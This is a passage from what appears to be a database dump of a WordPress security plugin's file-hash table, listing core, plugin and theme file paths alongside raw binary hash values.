���������DC��XG4WFP�#�N�S\Z','',0,'?'),('$��^���6bH^�*��','wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��gV�nn��#','Vw�ѻ}+��8m��A嵦���`D�\"\"�m�b','',0,'?'),('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zؑ�\"7�`�\'x᱉�','��3�^y��r\"�ﶪ���}#\"5�p�vK�','',0,'?'),('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�FH��\'\'n��ގ�','KD[Rஞ� ��5�:grP7*X\Z','',0,'?'),('%ɺ��<����;','wp-content/themes/newsmagbd/inc/customizer/core/control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M\"+Cv�׺�/�','�)��\nl�K\"��8hW	��5��:ߴ���','',0,'?'),('%f�Nvn9�,\r�W�','wp-includes/blocks/post-template/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a\Z	�~9�����','C��\\\n�K��탯j�>b\0�ě�43�:�','',0,'?'),('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h	U?�S�s�H�ב�Y��ٳ','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cJ>|Eqv0|bv�� ','ܟ�j�pe�M�N�?���a��Xi+!S�2','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%i����gca�W�!q�','wp-includes/blocks/cover/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�Uu�촊����','��n\n��=��	��H_i�r�7B �e�mx�d�','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WM��L�S����L\Z��','&��oQ\r\\��Š��<}\n�E֕E\r�M�8','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<,~�˥�,.�%��G','�Ӄ����T�ӏu�xf�ۍ��\rӣ�@beV�','',0,'?'),('%�fW���	�P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�39U��v�G&�3�','~6^��\nmƁ^O�0sN�\"��€�m��','',0,'?'),('%�~2\" ض=�ǿ\Z^�','wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('&3��9Q&m��Oc�Q','wp-includes/blocks/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-)�r����rk$��\Z','c�Axl�\"w\n6��h�+���D�y9�ɻ','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&*���dĆָ�	�H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t����j�̘��/�o','2�tv��v��|o�i=���x|����|�','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?bڔ��3��\r\n]m��','�jn�B����TN�&�e��>h��m���uIz<','',0,'?'),('&f|6��}�_��Ɍ�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��=���W��[!2','(2\nO���o�(m�n\\&�q���}tZ�Iyl','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(\n��fV������X�','U��+�n���������\r�{�ƹِX�8�','',0,'?'),('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�S�zM�+��*�֯','����/���Kݫ�T.��\"��ڢN��?�','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ��	R�Z��	�����	��6','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\"��}<м�鵴','$��Sl����\Z���P5��z7���H�','',0,'?'),('&���	P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&��tQ\\�j`�q��Y�','wp-includes/blocks/categories/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=)�`K׮�!2:�7','����1���\'s�1I�M���Z�����մ$iD','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('&饱����W��؀�|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv	','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���6����M�O�\0','��r�u�\'�5r�s\\��7	��=�u��r����','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>œӺ#�&�2Z�\'��K(*�����','',0,'?'),('\'Ac���,	~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'M��w�񑍷���\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W~��0�d���y�','_9��%7�N׌�[\"��m�;Xi:RG�x^�q]','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x	VJR��.=:','',0,'?'),('\'�g|͹\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'����t\\JZ�Ah�','wp-content/plugins/wp-cerber/assets/flags/se.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r5�E&a��_�&�	','Wh�LP!����#O�QkJ�Nj�9u`$�c��','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qxM!��\nB��+=L�',';�Oҥv���̉�����	����\n����','',0,'?'),('\'�,��r\n\n\r\Z�3�','wp-content/plugins/wp-cerber/assets/flags/mc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"0\r�2O�>�=D1�\0','�0�0V�>�K[�5_��R~�dy�� \ns��S��','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('()���A��G���T�w','wp-content/plugins/redirection/redirection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�*���`��[)��','��ycRGƝ �Ͱa$s��$�Я���^M','',0,'?'),('(0�0k9Y����A��\Z','wp-includes/blocks/preformatted/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B޶��%�� ��','��P��>����ꕾ�E}��aI�����\Z�p','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�pk8��o\'&{�','2C�sf�I�f��q���{W ��Z{��','',0,'?'),('(jxF0/���ʏ�)��','wp-content/plugins/redirection/locale/json/redirection-en_AU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j� �j������\\�','aIv;2Rb�$�8��C�h��b��wv2X�l','',0,'?'),('(l��օ+%�m���GI@','wp-includes/blocks/rss/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u-U�������,3','%�*�X�GV��D�:�i�f@e�L�zSYSp;	','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:�	','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N6\'8;ڇ믍���V1�','�oYH4	lY�1�YG�H�tmS�Z/)�\"��','',0,'?'),('(��Q�NE���y:�B��','wp-admin/images/about-header-privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.�5�CD��1>W\\','��A�{)pC�1���:5�$�S{��hza','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s����6�=�9��','B}�k��A�J�6�-XԞ���C��;�(Dm���j','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���\0p�k4؀X�K�','[A�:ɜݜ`�<��i��l���6`�e�E��','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(��9�ݗ�-�\'U�w��','wp-content/themes/newsmagbd/inc/pro/newsmagbd-admin-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�+B����eP��x','�������#�ހ��2�I8�J(���zO�h','',0,'?'),('(�1��� Θ:�','wp-content/plugins/redirection/models/permalinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�%�	1tN�\0Az�','��`�:�i�|��&#���P�ϸg�G��C','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('(��s�3TN�o(�','wp-admin/images/freedom-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XO��w^�Ȃe/��e�','���Rz�6�=�y���_��6Rj��l�T��','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(�=��,��*F\n�^Jv','wp-content/plugins/wp-cerber/assets/flags/eh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���n���7W6^\Z','��I�auK�+��<?�`]�n]�m|�P�ّS','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�ן�Ы��E*3��','���U�^����9p��&���`�nM{� n�L','',0,'?'),(')\'hL휞�\rЀ^����','wp-includes/blocks/page-list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�� d�p����Ur','4QNs��Ò��v�v��7D��b�`0f�0�gg','',0,'?'),(')FTj����CJc�G','wp-includes/blocks/image/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�W���\n�r\0��?�8�','p��~���f�#���h_Ŧ��Krw��Z1n0Ԃ','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�%rS�S�p?|�z1','��c4:f��	����\'���Cc-62�}�','',0,'?'),(')�3�\r��r-��ty','wp-includes/blocks/media-text/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6`��\rt��\"�5�D�','�p�-���B�q������B�^g��jM�','',0,'?'),(')�Cca���ݟ�\Z=�K','wp-content/plugins/wordfence/js/admin.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ�<?�<��A&�','}ٕ�����\Z�H0B�vW��Yp:���4o��3','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0B6\"��–�7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�g��s� ���`V�','��j(���ؠ\r	緪���U+���.�d','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')警�Q��Q�/Y�9','wp-includes/blocks/page-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\0x�\rˡ�8���P:�s','��vM���}��\'�^~��vNF���|{�E','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&���������','�=��ΰQ5a��(j0hnP4%%f4+��#���','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƄƑ����D�{��crX','��S#j��7Q\rF�p�oN�dpx��R��e�','',0,'?'),('*Tǚ�qG6��R��H�','wp-includes/blocks/site-logo/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�zQ�^P��,�ʾ+','[胴���t}���t���Q��`�4�m�R','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��QT�{̬��7zE�','\"=-�C��>M^�]�(�Z|;Q��������','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͈ϚW:l���q~','�g��NQ	�������/���	�y5������θc','',0,'?'),('*��*�W8��5��2~','wp-includes/css/dist/reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JRK�N�` �1U%�','�+��,q�K�*��~��B��2���\n�ū�','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*�	�ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�u�\nL������E','L8M��0�=�Y�kb���|59�b+�z:4','',0,'?'),('+�(-V&S_2X7f�','wp-includes/blocks/paragraph/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�*�V��*)�}�4','ٯt]f����(ވ�9�)��ʷ�I]J#','',0,'?'),('+�gv�����','wp-content/plugins/wordfence/css/wf-onboarding.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('+&|1�� �w6�b��*','wp-content/plugins/wp-cerber/assets/flags/vu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�@�C.�J���#','��;����\0ě�k��=���G���W$��۳','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Fy2���T�(','1��^��ZH��ʬ���}-G�D;U��W�|','',0,'?'),('+E.�X��{.�@g�@�','wp-content/plugins/redirection/locale/redirection-en_ZA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�>���6�)�Z1','C�g��k����Dx\'�\\�Y_�=��˚�H/�','',0,'?'),('+N�H��l}¸�t��+','wp-content/plugins/redirection/locale/redirection-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y �D��ɋk�-�\'�','߼RP_1��4A��>V=�i�_v���	ۈ����','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0	','',0,'?'),('+lH�m�ӿn�Q���','wp-content/plugins/wp-cerber/assets/flags/ae.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*� �X4^���','ظ�,&9uO�)S�ղ�?(2��ᖘ��Lq9�,�','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Z�����x���d','�&9�+��\\\0���	҄&1ܪCj��ڠ�Z','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','谼��v���ν��','�p�g@0\rt@#PM�%�Y�6�9�\Z��M�P^','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+�b����I=qY��','wp-includes/blocks/freeform/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�[%0���G���','�\r.ZE��h����(:�0B���$u�F','',0,'?'),('+̷�Y���p��$$�,_','wp-content/plugins/redirection/redirection-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e`���vǩ���!','C0�j�z��L�;�1�Q���Y���b%ט8�1','',0,'?'),('+��w��dmD���X�=','wp-content/plugins/redirection/locale/json/redirection-es_VE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qZ_�-걑���','P³����c+��y���<йV����x�','',0,'?'),('+�-�re�=XZr�yg','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|T��}<o��d���','��K��-��9-���k�#�Ƙ��&PwY�','',0,'?'),(',��Je����;�','wp-content/plugins/wp-cerber/assets/flags/sv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�Z�k�}Ϸ	��>','?Ύ�~-y�Ph#sbP���\Z��=��1�tՈY','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'`������a��� ��','�����y���DFR#\\\\F/��G%RY��x!�B6a','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',Ip��U�w�b��A@#','wp-includes/blocks/spacer/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	@-ŏ��K$_ӯp�','�D�\Z�e�(�kr�����l0�u�[Iya/�/�H','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��n��h��g�\"�|U','{��ͳ�P��-E��+��m��I�y�\ZV����','',0,'?'),(',a�(�f��>��k��','wp-content/plugins/wp-cerber/assets/flags/dj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�2�cV�>�!�>�','��A|�L���0��ܷ��H��̠���Y���','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�d�4��y�N�4','aƙ�4>$�z���%�5��z	����9��_','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',�x\Zpp������L��','wp-content/plugins/wp-cerber/assets/flags/at.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v$<��dkmy\\g�','g߇���;o*���^�U㋥GjJ��>�ED\\�%','',0,'?'),(',�M�&���K�f~��hK','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�g2�.qExJ�H&','�RhZ^�g�<��F���~�F�H�Y��C07','',0,'?'),(',�������lS���r','wp-includes/css/dist/editor/editor-styles-rtl.min.css',0,'��?4��nT�#���','��?4��nT�#���','�D�ծ6��8g\n)e���z��l�1�MH��&','',0,'?'),(',愵�X�ա�y%�!�o','wp-content/plugins/wp-cerber/assets/flags/iq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��C!���>�hF','�����=zZ!��i��74\'�j\"DC���͎(','',0,'?'),(',��(X\'����%Z��|','wp-includes/blocks/group/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����|��VƳ\\��\'','\Z�Y���ӗ�З����t�M����Y뗷�|T','',0,'?'),('-\r�7�<9m{�1Sq','wp-content/plugins/redirection/models/redirect/redirect-sanitizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�!���2KD<�U�','�XVy��M�\nْy���I	oLk�YC�.u','',0,'?'),('-+�ppRv�M�#^0-�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8h�q}��Rr�B','\Z�ww�rd��C�e�Mʵ�AY��y94,O�','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������� \\�','��K